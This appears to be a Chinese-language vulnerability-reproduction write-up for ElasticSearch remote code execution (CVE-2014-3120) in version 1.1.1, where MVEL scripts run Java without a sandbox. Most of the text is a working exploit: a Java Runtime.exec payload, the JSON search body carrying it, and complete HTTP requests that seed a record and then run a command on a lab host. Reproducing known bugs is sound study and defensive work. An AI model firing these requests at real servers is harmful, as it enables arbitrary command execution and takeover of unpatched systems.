ElasticSearch 命令执行漏洞(CVE-2014-3120)

ElasticSearch 命令执行漏洞(CVE-2014-3120)

jre版本:openjdk:8-jre

elasticsearch版本:v1.1.1

相关文档:http://bouk.co/blog/elasticsearch-rce/https://www.t00ls.net/viewthread.php?tid=29408

老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。

MVEL执行命令的代码如下:

1
2
import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();

漏洞复现

将Java代码放入json中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}

首先,该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据:

1
2
3
4
5
6
7
8
9
10
11
12
POST /website/blog/ HTTP/1.1
Host: 192.168.44.132:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
"name": "phithon"
}

然后,执行任意代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /_search?pretty HTTP/1.1
Host: 192.168.44.132:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}

结果如图:

image-20210719104741517

0%